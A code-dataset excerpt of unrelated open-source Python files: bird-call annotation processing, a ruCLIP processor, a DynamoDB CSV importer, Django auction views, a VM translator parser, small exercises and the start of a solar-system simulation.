print('n_remarks', n_remarks) # 64\n\n # Rename cols\n df = df.rename(columns={'new_name': 'filename', 'begin_time': 'start_time', 'low_freq': 'start_frequency', 'high_freq': 'end_frequency', 'anmerkung': 'remarks'})\n \n # Add metadata\n \n df['record_date'] = None\n df['record_time'] = None\n\n df['vocalization_type'] = None\n df['quality_tag'] = 3\n df['record_filepath'] = None\n\n \n for ix, row in df.iterrows():\n\n # Get vocalization_type from anmerkung (remarks)\n remark = row['remarks']\n if 'puitzen' in remark and not 'quorren' in remark:\n df.at[ix, 'vocalization_type'] = 'squeak'\n if not 'puitzen' in remark and 'quorren' in remark:\n df.at[ix, 'vocalization_type'] = 'grunt'\n\n # # ToDo: correct/add type depending on start/end_frequency\n # if row['start_frequency'] > 1800.0 and row['end_frequency'] > 9000.0:\n # df.at[ix, 'vocalization_type'] = 'squeak'\n # if row['end_frequency'] < 5000.0:\n # t=1\n\n\n\n # Get quality from anmerkung\n 
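        # Note: the order of the checks below matters - 'sehr gut' also
        # contains the substring 'gut', so the 'sehr gut' branch must come
        # after the plain 'gut' branch to override quality_tag 2 with 1
        # (same for 'leise' vs. 'sehr leise').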
if 'gut' in remark:\n df.at[ix, 'quality_tag'] = 2\n if 'sehr gut' in remark or 'laut' in remark or 'deutlich' in remark:\n df.at[ix, 'quality_tag'] = 1\n if 'leise' in remark or 'Knacken' in remark or 'Regen' in remark or 'schlechte Qualität' in remark:\n df.at[ix, 'quality_tag'] = 4\n if 'sehr leise' in remark:\n df.at[ix, 'quality_tag'] = 5\n\n # Get date, time from filename\n parts = row['filename'].split('_')\n date_str = parts[6]\n df.at[ix, 'record_date'] = date_str[:4] + '-' + date_str[4:6] + '-' + date_str[6:10]\n time_str = parts[7]\n df.at[ix, 'record_time'] = time_str[:2] + ':' + time_str[2:4] + ':' + time_str[4:6]\n\n # Get record_filepath\n df.at[ix, 'record_filepath'] = audio_src_dir + row['filename']\n\n #print(ix, remark, date_str, time_str)\n \n \n #print(df[:8])\n\n # Add more global metadata\n df['location_name'] = 'Baden-Württemberg'\n df['record_license'] = 'Usage restricted for training devise models!'\n df['record_remarks'] = 'Provided by Forstliche Versuchs- und Forschungsanstalt Baden-Württemberg (FVA). Only use for training (devise) models!'\n df['equipment_name'] = 'AudioMoth'\n df['equipment_sound_device'] = 'AudioMoth'\n df['equipment_microphone'] = 'MEMS'\n df['species_latin_name'] = 'Scolopax rusticola'\n df['collection_name'] = 'FVA (devise)' # ?\n\n #print(df[:8])\n\n # Create noise (species absent) annotations\n # Unfortunately not reliable\n # Some weak signals are not annotated, e.g. 14569_1_2020_06_11_FVA133_20200611_194506.WAV 116,18898 - 369,0195s)\n df_noise = create_noise_annotations(df)\n df_noise['noise_name'] = 'Scolopax rusticola absent'\n \n # Concat dfs\n df['noise_name'] = None\n df = pd.concat([df, df_noise], ignore_index=True, sort=False).reset_index(drop=True)\n \n \n \n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n \n #print(df)\n\n#process_fva()\n\ndef postprocess_fva():\n\n write_metadata = True\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v02'\n\n path = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v01_TableTemp.xlsx'\n df = pd.read_excel(path, keep_default_na=False, engine='openpyxl')\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Get Karl modifications\n path_karl = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v01_TableTemp_korr_KF.xlsx'\n df_karl = pd.read_excel(path_karl, keep_default_na=False, engine='openpyxl')\n df_karl = df_karl.sort_values(['filename', 'start_time']).reset_index(drop=True)\n \n df_diff = df.compare(df_karl)\n #print(df_diff)\n\n # Use karl modifications\n df = df_karl.copy()\n\n # Sanity checks \n for ix, row in df.iterrows():\n if row['end_time'] - row['start_time'] < 0.01:\n print('Warning end_time-start_time < 0.01', ix, row['filename'], row['start_time'], row['end_time'])\n if row['end_frequency'] and row['start_frequency'] and row['end_frequency'] - row['start_frequency'] < 10:\n print('Warning end_frequency-start_frequency < 10', ix, row['filename'], row['start_frequency'], row['end_frequency'])\n\n '''\n Warning end_time-start_time < 0.01 2963 44174_1_2020_06_23_FVA031_20200623_201930.WAV 314.3247 314.3247\n Warning end_frequency-start_frequency < 10 2963 44174_1_2020_06_23_FVA031_20200623_201930.WAV 6946.5 6946.5\n Warning end_time-start_time < 0.01 3002 44397_4_2020_06_01_FVA031_20200601_194506.WAV 
372.3435 37.24712\n Warning end_time-start_time < 0.01 3007 44397_4_2020_06_19_FVA031_20200619_193349.WAV 244.5683 24.46741\n '''\n\n # 3002 & 3007 corrected manually in Scolopax_rusticola_FVA_v01_TableTemp_korr_KF.xlsx\n\n # Remove id=2963\n df = df.drop([2963]).reset_index(drop=True)\n\n\n # Set id=1 and background examples to id=2 ?\n df['id_level'] = 2\n df.loc[df['species_latin_name'] == 'Scolopax rusticola', 'id_level'] = 1\n\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n\n#postprocess_fva()\n\ndef postprocess_hakan_Crex_crex_Wellenberge_Lokalisation_2017():\n\n write_audio_files = False # True False\n write_metadata = True\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Crex_crex_Wellenberge_Lokalisation_2017_v02'\n\n path = root_dir + 'Annotationen/Crex_crex_Wellenberge/Crex_crex_Wellenberge_Lokalisation_2017_v1.xlsx'\n df = pd.read_excel(path, keep_default_na=False, engine='openpyxl')\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n #print(df)\n\n filenames = list(df['filename'].unique())\n n_files = len(filenames)\n\n audio_dst_dir = root_dir + 'Annotationen/Crex_crex_Wellenberge/_Segments/'\n \n counter = 0\n for filename in filenames:\n\n #if counter > 1: break\n\n path = df[df['filename']==filename].record_filepath.values[0]\n\n # with sf.SoundFile(path) as f:\n # duration = f.frames/f.samplerate\n\n # Extract channel 0\n channel_ix = 0\n if write_audio_files:\n write_part_of_audio_file(path, channel_ix=channel_ix, dst_dir=audio_dst_dir)\n\n # Update filename and path\n filename_new = filename + create_postfix_str(0) + '_c' + str(channel_ix)\n record_filepath_new = audio_dst_dir + filename_new + '.wav'\n df.loc[df['filename'] == filename, 'record_filepath'] = record_filepath_new\n df.loc[df['filename'] == filename, 'filename'] = filename_new\n \n\n\n print(filename)\n counter += 1\n \n # Update channel_ix=None (only one channel after selecting channel 0)\n df['channel_ix'] = None\n\n print(df)\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#postprocess_hakan_Crex_crex_Wellenberge_Lokalisation_2017()\n\n\n\n\n\ndef concat_excel_annotations():\n\n write_metadata = True\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/AnnotationsInDbSoFar_v02'\n\n src_dir = root_dir + 'Annotationen/_MetadataReadyForDbInsert/'\n xlsx_files = [\n \"Crex_crex_Unteres_Odertal_2017_v02.xlsx\",\n \"Crex_crex_Wellenberge_Lokalisation_2017_v02.xlsx\",\n \"CrexCrex_LarsAnnotaions_v03.xlsx\",\n \"Scolopax_rusticola_ARSU_2021_v07.xlsx\",\n \"Scolopax_rusticola_ARSU_2022_v07.xlsx\",\n \"Scolopax_rusticola_FVA_v02.xlsx\",\n \"Scolopax_rusticola_MfN_Peenemuende+Schoenow_v04.xlsx\"\n ]\n \n df_list = []\n for file in xlsx_files:\n path = src_dir + file\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n\n df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n df_list.append(df)\n\n df = pd.concat(df_list).reset_index(drop=True)\n #df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Drop some cols\n df = df.drop(columns=['record_filepath', 'collection_name', 'remarks', 'record_license', 'record_remarks', ])\n\n # Add split\n df['split'] = 'train'\n\n # Choose test split\n # Scolopax rusticola ARSU 2022 \n df.loc[(df['location_name'] == 'Gellener Torfmöörte') & 
(df['record_date'].str.startswith('2022-', na=False)), 'split'] = 'test'\n # Crex crex devise recordings ? --> To check if devise equipment was used\n df.loc[(df['location_name'] == 'Unteres Odertal') & (df['annotator_name'] == 'Beck, Lars'), 'split'] = 'test'\n\n\n cols = df.columns\n #print(cols)\n\n # print('location_name', list(df['location_name'].unique()))\n # print('annotator_name', list(df['annotator_name'].unique()))\n # print('noise_name', list(df['noise_name'].unique()))\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#concat_excel_annotations()\n\n\nprint('Done.')","repo_name":"hdogan84/database","sub_path":"src/devise/01_1_process_collections_mario.py","file_name":"01_1_process_collections_mario.py","file_ext":"py","file_size_in_byte":59266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21233640060","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nimport torch\nimport numpy as np\nimport youtokentome as yttm\nimport torchvision.transforms as T\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nclass RuCLIPProcessor:\n eos_id = 3\n bos_id = 2\n unk_id = 1\n pad_id = 0\n\n def __init__(self, tokenizer_path, image_size=224, text_seq_length=77, mean=None, std=None):\n self.tokenizer = yttm.BPE(tokenizer_path)\n self.mean = mean or [0.48145466, 0.4578275, 0.40821073]\n self.std = std or [0.26862954, 0.26130258, 0.27577711]\n self.image_transform = T.Compose([\n T.Lambda(lambda img: img.convert('RGB') if img.mode != 'RGB' else img),\n T.RandomResizedCrop(image_size, scale=(1., 1.), ratio=(1., 1.)),\n T.ToTensor(),\n T.Normalize(mean=self.mean, std=self.std)\n ])\n self.text_seq_length = text_seq_length\n self.image_size = image_size\n\n def encode_text(self, text):\n text = text.lower()\n tokens = self.tokenizer.encode([text], output_type=yttm.OutputType.ID, dropout_prob=0.0)[0]\n tokens = tokens[:self.text_seq_length-2]\n tokens = [self.bos_id] + tokens + [self.eos_id]\n return self.prepare_tokens(tokens)\n\n def prepare_tokens(self, tokens):\n empty_positions = self.text_seq_length - len(tokens)\n if empty_positions > 0:\n tokens = np.hstack((tokens, np.zeros(empty_positions))) # position tokens after text\n if len(tokens) > self.text_seq_length:\n tokens = tokens[:self.text_seq_length-1] + tokens[-1:]\n return torch.tensor(tokens).long()\n\n def decode_text(self, encoded):\n return self.tokenizer.decode(encoded.cpu().numpy().tolist(), ignore_ids=[\n self.eos_id, self.bos_id, self.unk_id, self.pad_id\n ])[0]\n\n def __call__(self, text=None, images=None, **kwargs):\n inputs = {}\n if text is not None:\n input_ids = []\n texts = [text] if isinstance(text, str) else text\n for text in texts:\n tokens = self.encode_text(text)\n input_ids.append(tokens)\n inputs['input_ids'] = pad_sequence(input_ids, batch_first=True)\n if images is not None:\n pixel_values = []\n for i, image in enumerate(images):\n pixel_values.append(self.image_transform(image))\n inputs['pixel_values'] = pad_sequence(pixel_values, batch_first=True)\n return inputs\n\n @classmethod\n def from_pretrained(cls, folder):\n tokenizer_path = os.path.join(folder, 'bpe.model')\n config = json.load(open(os.path.join(folder, 'config.json')))\n image_size = config['image_resolution']\n text_seq_length = config['context_length']\n mean, std = config.get('mean'), config.get('std')\n return cls(tokenizer_path, image_size=image_size, text_seq_length=text_seq_length, mean=mean, 
std=std)\n","repo_name":"ai-forever/ru-clip","sub_path":"ruclip/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"53"} +{"seq_id":"17338641111","text":"\"\"\"\ncreated by Nagaj at 13/07/2021\n\"\"\"\n\n\ndef fib_three(a, b, c):\n def get_three(): # inner function\n # print(a, b, c)\n return a, b, c\n\n return get_three\n\n\nfunction = fib_three(4, 6, 7) # fib_three returns func obj\nprint(function)\n\nnumbers = function() # so, function obj can be callable. function() returns numbers\nprint(numbers)\na, *others = numbers # unpacking just 'a' and packing other numbers to 'others'\nprint(a)\nprint(others)\n","repo_name":"NagahShinawy/python-decorators","sub_path":"2-functions/2-function_within_function.py","file_name":"2-function_within_function.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13697739564","text":"\"\"\"Dynamo Example\"\"\"\n\nimport csv\nfrom pprint import pprint\nimport boto3\nimport threading\n\nsession = boto3.Session(profile_name=\"default\")\ndynamodb = session.resource('dynamodb', region_name='us-west-2')\n\ndef dynamo_create_table(table_name, key_schema, attribute_definitions):\n try:\n table = dynamodb.create_table(\n TableName=table_name,\n KeySchema=key_schema,\n AttributeDefinitions=attribute_definitions,\n ProvisionedThroughput={\n \"ReadCapacityUnits\": 5,\n \"WriteCapacityUnits\": 5,\n }\n )\n table.meta.client.get_waiter(\"table_exists\").wait(TableName=table_name)\n print(\"table created\")\n return True\n except Exception as e:\n print(e)\n return False\n\n\n\ndef import_data_multithreaded(filepath):\n print(\"opening file: %s\" % filepath)\n collection_name = filepath.split(\"/\")[-1].split(\".\")[0]\n print(\"creating collection: %s\" % collection_name)\n\n with open(filepath) as file:\n reader = csv.reader(file, delimiter=\",\")\n\n header = False\n for row in reader:\n if not header:\n header = [h for h in row]\n\n dynamo_create_table(\n collection_name,\n [\n {\n 'AttributeName': header[0],\n 'KeyType': 'HASH'\n }\n ],\n [\n {\n 'AttributeName': header[0],\n 'AttributeType': 'S'\n },\n ],\n )\n else:\n data = {\n header[column]:value \n for column, value in enumerate(row)\n }\n\n # {'Credit_limit': '237',\n # 'Email_address': 'Jessy@myra.net',\n # 'Home_address': '337 Eichmann Locks',\n # 'Id': 'C000000',\n # 'Last_name': 'Shanahan',\n # 'Name': 'Rickey',\n # 'Phone_number': '1-615-598-8649 x975',\n # 'Status': 'Active'\n\n try:\n dynamodb.Table(collection_name).put_item(\n Item=data\n )\n except Exception as e:\n print(e)\n\n # pprint(data)\n # break\n\n\n\n\n\nif __name__ == \"__main__\":\n files = [\n \"data/product.csv\",\n \"data/rental.csv\",\n \"data/customer.csv\",\n ]\n\n threads = []\n for filepath in files:\n thread = threading.Thread(\n target=import_data_multithreaded,\n args=(filepath,)\n )\n thread.start()\n threads.append(thread)\n\n # blocking\n for thread in threads:\n thread.join()\n\n\n # print(dynamodb.Table(\"product\").scan()[\"Items\"])\n\n\n print(\"goodbye\")\n\n","repo_name":"brydavis/rentals","sub_path":"src/dynamo.py","file_name":"dynamo.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37916452467","text":"def maxSubarraySumCircular(A):\n total, maxSum, curMax, minSum, curMin = 0, 
-float('inf'), 0,float('inf'),0\n for i in A:\n curMax=max(curMax+i,i)\n curMin =min(curMin+i,i)\n maxSum=max(maxSum,curMax)\n minSum=min(minSum,curMin)\n total+=i\n return max(maxSum,total-minSum) if maxSum >0 else maxSum\n\nprint(maxSubarraySumCircular([-1,-2,-3])) \n\n","repo_name":"Abhinav2903/foobarandleetccode","sub_path":"maxsumcisubarray.py","file_name":"maxsumcisubarray.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28133444287","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom .models import User, Auctions, Watchlist, Bids, Comments, History\nimport os\n\n\ndef create(request):\n if request.method == \"POST\" and request.user.is_authenticated:\n f = Auctions(\n name = request.POST[\"title\"],\n condition = request.POST[\"condition\"],\n description = request.POST[\"description\"],\n image = request.POST[\"image\"],\n availability = request.POST[\"quantity\"],\n start_bid = request.POST[\"start_bid\"],\n category = request.POST[\"category\"],\n user = User.objects.get(id = request.user.id)\n )\n f.save()\n return HttpResponseRedirect(reverse(\"item\", args=( f.id,) ))\n return render(request, \"auctions/create.html\", {\n \"categories\":return_categories(),\n \"conditions\":return_conditions()\n })\n\n\ndef item(request, item_id):\n item = Auctions.objects.filter(id = item_id).values().first()\n seller_id = item[\"user_id\"]\n seller = User.objects.filter(id = seller_id).values().first()['username']\n user_id = request.user.id\n\n try:\n comments = []\n for i in Comments.objects.filter(item = item_id).order_by(\"id\").values():\n dictionary = {}\n dictionary[\"username\"] = User.objects.filter(id = i[\"user_id\"]).values().first()[\"username\"]\n dictionary[\"comment\"] = i[\"comment\"]\n comments.append(dictionary)\n except:\n comments = [\"No comments yet\"]\n\n try:\n if item_id == Watchlist.objects.filter(item_id = item_id, user_id = user_id).values().first()[\"item_id\"]:\n watchlist_status = \"Remove from Watchlist\"\n except:\n watchlist_status = \"Add to Watchlist\"\n\n try:\n min_bid = item['buy_price']\n highest_bidder_id = item['buyer_id']\n highest_bidder = User.objects.filter(id = highest_bidder_id).values().first()[\"username\"]\n except:\n try:\n bid = Bids.objects.filter(item_id = item_id).order_by(\"-bid\").values().first()\n min_bid = bid['bid']\n highest_bidder_id = bid['user_id']\n highest_bidder = User.objects.filter(id = highest_bidder_id).values().first()[\"username\"]\n except:\n min_bid = item['start_bid']\n highest_bidder_id = \"\"\n highest_bidder = \"\"\n\n return render(request, \"auctions/item.html\", {\n \"item\":item,\n \"seller\":seller,\n \"watchlist\":watchlist_status,\n \"min_bid\":min_bid,\n \"highest_bidder_id\":highest_bidder_id,\n \"highest_bidder\":highest_bidder,\n \"comments\":comments,\n \"status\":item['status'],\n })\n\n\ndef bid(request, item_id):\n if request.method == \"POST\" and request.user.is_authenticated:\n user_id = request.user.id\n item_bids = []\n for i in Bids.objects.filter(user_id = user_id).values():\n item_bids.append(i['item_id'])\n if item_id in item_bids:\n b = Bids.objects.get(user_id = user_id, item_id = item_id)\n b.bid = request.POST[\"bid\"]\n b.save()\n return HttpResponseRedirect(reverse(\"item\", 
args=(item_id,)))\n b = Bids (\n user = User.objects.get(id = request.user.id),\n item = Auctions.objects.get(id = item_id),\n quantity = request.POST[\"quantity\"],\n bid = request.POST[\"bid\"]\n )\n b.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\ndef change_watchlist(request, item_id):\n if request.method == \"POST\" and request.user.is_authenticated:\n user_id = request.user.id\n items_watchlist = set()\n try:\n for i in Watchlist.objects.filter(user_id = request.user.id).values():\n items_watchlist.add(i['item_id'])\n if item_id in items_watchlist:\n Watchlist.objects.filter(item_id = item_id, user_id = user_id).delete()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n except:\n pass\n w = Watchlist (\n item = Auctions.objects.get(id = item_id),\n user = User.objects.get(id = request.user.id)\n )\n w.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\ndef close(request, item_id):\n bid = Bids.objects.filter(item_id = item_id)\n item = Auctions.objects.filter(id = item_id)\n\n if not bid:\n item.delete()\n\n try:\n buyer = bid.order_by(\"-bid\").values().first()['user_id']\n seller = item.values().first()['user_id']\n\n h = History(\n buyer = User.objects.get(id = buyer),\n seller = User.objects.get(id = seller),\n price = bid.order_by(\"-bid\").values().first()['bid'],\n quantity = bid.values().first()['quantity'],\n item = item.first()\n )\n h.save()\n\n if item.values().first()['availability'] == 1: \n item.update(status = 0, availability = 0)\n elif item.values().first()['availability'] > 1:\n availability = item.values().first()['availability']\n item.update(availability = availability - bid.values().first()['quantity'])\n \n bid.delete()\n Watchlist.objects.filter(item_id = item_id).delete()\n\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n except:\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef comment(request, item_id):\n if request.method == \"POST\":\n c = Comments (\n user = User.objects.get(id = request.user.id),\n item = Auctions.objects.get(id = item_id),\n comment = request.POST[\"comment\"]\n )\n c.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\n#### Functions rendered by aux function show ####\n\n\ndef show(request, items, pagename):\n try:\n return render(request, \"auctions/show.html\", {\n \"items\":items,\n \"pagename\":pagename\n })\n except:\n return render(request, \"auctions/show.html\", {\n \"items\":[],\n \"pagename\":pagename\n }) \n\n\ndef index(request):\n return show(request, Auctions.objects.filter(status = 1).values(), \"Active Listings\") \n\n\ndef mylistings(request):\n if request.user.is_authenticated:\n return show(request, Auctions.objects.filter(status = 1, user_id = request.user.id).values(), \"My Active Listings\")\n \n \ndef watchlist(request):\n items = []\n for i in Watchlist.objects.filter(user_id = request.user.id).values():\n items.append(Auctions.objects.filter(id = i[\"item_id\"]).values().first())\n return show(request, items, \"Watchlist\")\n\n\n#### Functions rendered by aux function show_hist ####\n\n\ndef show_hist(request, items, pagename, side):\n try:\n return render(request, \"auctions/history.html\", {\n \"items\":items,\n \"pagename\":pagename,\n \"side\":side\n })\n except:\n return render(request, \"auctions/history.html\", {\n \"items\":[],\n \"pagename\":pagename,\n \"side\":side\n }) \n\n\ndef buy_history(request):\n if request.user.is_authenticated:\n buy_sell_side = True\n \n items = 
[]\n for item in History.objects.filter(buyer = request.user.id).values():\n li = Auctions.objects.filter(id = item['item_id']).values().first()\n li['buyer_username'] = User.objects.filter(id = item['buyer_id']).values().first()['username']\n li['seller_username'] = User.objects.filter(id = item['seller_id']).values().first()['username']\n li['price'] = item['price']\n li['quantity'] = item['quantity']\n items.append(li)\n return show_hist(request, items, \"Buy History\", buy_sell_side)\n\n\ndef sell_history(request):\n if request.user.is_authenticated:\n buy_sell_side = False\n\n items = []\n for item in History.objects.filter(seller = request.user.id).values():\n li = Auctions.objects.filter(id = item['item_id']).values().first()\n li['buyer_username'] = User.objects.filter(id = item['buyer_id']).values().first()['username']\n li['seller_username'] = User.objects.filter(id = item['seller_id']).values().first()['username']\n li['price'] = item['price']\n li['quantity'] = item['quantity']\n items.append(li)\n return show_hist(request, items, \"Sell History\", buy_sell_side)\n\n\n#### Category related ####\n\n\ndef categories(request):\n return render(request, \"auctions/categories.html\",{\n \"categories\":return_categories()\n })\n\n\ndef category(request, category):\n items = []\n for i in Auctions.objects.filter(category=category, status = 1).values():\n items.append(i)\n return render(request, \"auctions/category.html\", {\n \"items\":items,\n \"category\":category\n })\n\n\n### Get starting functions ###\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n\n # Ensure password matches confirmation\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n\n## Auxiliary functions ##\n\n\ndef return_categories():\n path = os.getcwd()\n file_dir = path + \"\\\\categories.txt\"\n f = open(file_dir, \"r\").read()\n categories = f.split(\"\\n\")\n return categories\n\n\ndef return_conditions():\n path = os.getcwd()\n file_dir = path + \"\\\\conditions.txt\"\n f = open(file_dir, \"r\").read()\n conditions = f.split(\"\\n\")\n return 
conditions\n","repo_name":"brunnorpdias/CS50W","sub_path":"project_2/commerce/auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17195855977","text":"from collections import deque\nimport sys\n\ninput = sys.stdin.readline\nstring = input()\nn = int(input())\n\nleft = list(string)[:-1]  # drop the trailing newline kept by readline\nright = deque()\n\nfor _ in range(n):\n    ins = input().split()\n\n    if len(ins) == 2:\n        left.append(ins[1])\n    else:\n        if ins[0] == \"L\":\n            if len(left) > 0:\n                right.appendleft(left.pop())  # O(1) on a deque\n        elif ins[0] == \"D\":\n            if len(right) > 0:\n                left.append(right.popleft())\n        elif ins[0] == \"B\":\n            if len(left) > 0:\n                left.pop()\n\nprint(\"\".join(left) + \"\".join(right))","repo_name":"JungWooGeon/BAEKJOON","sub_path":"1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13661343923","text":"import enum\n\n\nclass Command(enum.Enum):\n    C_ARITHMETIC = 1\n    C_PUSH = 2\n    C_POP = 3\n    C_LABEL = 4\n    C_GOTO = 5\n    C_IF = 6\n    C_FUNCTION = 7\n    C_RETURN = 8\n    C_CALL = 9\n\n\nclass Parser:\n    \"\"\"\n    handles the parsing of a single .vm file; reads a vm command, parses the\n    command into its lexical components, and provides convenient access to\n    said components. ignores all whitespace and comments\n    \"\"\"\n\n    def __init__(self, filename):\n        \"\"\"\n        opens a .vm file and saves all vm commands for later processing but\n        does not include comments or whitespace\n        :param filename:\n        \"\"\"\n\n        with open(filename, 'r') as vm_file:\n            lines = vm_file.readlines()\n        self.vm_commands = []\n        self.commandIndex = -1 # current command index;\n        self.currentCommand = None # initially there is no current command\n\n        for line in lines:\n            # ignore whitespace\n            if line == '\\n':\n                continue\n\n            # ignore entire-line comments\n            if line[0] == '/' and line[1] == '/':\n                continue\n\n            # ignore mid-line comments\n            try:\n                index = line.index('//')\n                line = line[0:index]\n            except ValueError:\n                # '//' wasn't found!\n                pass\n\n            # strip whitespace; skip lines that are left empty afterwards\n            line = line.strip()\n\n            if line:\n                self.vm_commands.append(line)\n\n\n    def command(self) -> str:\n        \"\"\"\n        returns the current VM command\n        \"\"\"\n        return self.currentCommand\n\n\n    def hasMoreCommands(self) -> bool:\n        \"\"\"\n        :return: true if the parser contains more commands to be parsed\n        \"\"\"\n        return self.commandIndex < len(self.vm_commands) - 1\n\n\n    def advance(self) -> None:\n        \"\"\"\n        goes to the next vm command if there are any\n        \"\"\"\n        self.commandIndex += 1\n        self.currentCommand = self.vm_commands[self.commandIndex]\n\n\n    def commandType(self) -> Command:\n        \"\"\"\n        :return: a Command enumeration corresponding to the command type of\n        the current vm command\n        \"\"\"\n\n        current = self.command()\n        tokens = current.split()\n\n        command_name = tokens[0]\n        arithmetic = ['add', 'sub', 'neg', 'eq', 'gt', 'lt', 'and', 'or', 'not']\n\n        if command_name in arithmetic:\n            return Command.C_ARITHMETIC\n\n        if command_name == 'pop':\n            return Command.C_POP\n\n        if command_name == 'push':\n            return Command.C_PUSH\n\n        raise ValueError(f'VM command not recognized: {self.command()}')\n\n\n    def arg1(self) -> str:\n        # TODO check: don't call if c_return\n        return self.command().split()[1]\n\n\n    def arg2(self) -> str:\n        # TODO check: call only if current command is push, pop, function, call\n        
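# Added note (not in the original): arg2 is the command's second argument,\n        # e.g. arg2() returns '7' when the current command is 'push constant 7'.\n        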
return self.command().split()[2]\n","repo_name":"kiwi-fruitiwi/py-vmTranslator","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24506533424","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nplt.style.use('dark_background')\n\nclass Body:\n def __init__(self, mass, position, velocity, color):\n self.mass = mass # mass of the body\n self.position = np.array(position, dtype='float64') # initial position of the body in the space\n self.velocity = np.array(velocity, dtype='float64') # initial velocity of the body\n self.color = color # color of the body in the plot\n\n# Define gravitational constant\nG = 6.67430e-11 # m^3 kg^-1 s^-2\n\n# Define bodies in the solar system\n# Positions and velocities are set so that the planets start at the positive x-axis and move in the positive y-direction\nsun = Body(1.989e30, [0, 0, 0], [0, 0, 0], 'orange')\n# sun = Body(1.989e30, [0, 0, 0], [0, 0, 0], 'orange', 'Sun', fixed=False)\nearth = Body(5.972e24, [1.496e11, 0, 0], [0, 2.9783e4, 0], 'blue')\nmoon = Body(7.342e22, [1.496e11, 3.844e8, 0], [1.022e3, 2.9783e4, 0], 'grey')\nmercury = Body(3.301e23, [5.791e10, 0, 0], [0, 4.736e4, 0], 'yellow')\nvenus = Body(4.867e24, [1.082e11, 0, 0], [0, 3.502e4, 0], 'green')\nmars = Body(6.417e23, [2.279e11, 0, 0], [0, 2.407e4, 0], 'red')\njupiter = Body(1.899e27, [7.785e11, 0, 0], [0, 1.307e4, 0], 'orange')\nsaturn = Body(5.685e26, [1.434e12, 0, 0], [0, 9.68e3, 0], 'goldenrod')\nuranus = Body(8.682e25, [2.871e12, 0, 0], [0, 6.8e3, 0], 'lightblue')\nneptune = Body(1.024e26, [4.495e12, 0, 0], [0, 5.43e3, 0], 'blue')\n\n# Put the bodies in a list\nbodies = [\n sun\n , mercury\n , venus\n , earth\n , moon\n , mars\n # , jupiter\n # , saturn\n # , uranus\n # , neptune\n ]\n\nsize_dict = {\n sun: 20,\n mercury: 10,\n venus: 10,\n earth: 10,\n moon: 5,\n mars: 10,\n jupiter: 15,\n saturn: 14,\n uranus: 13,\n 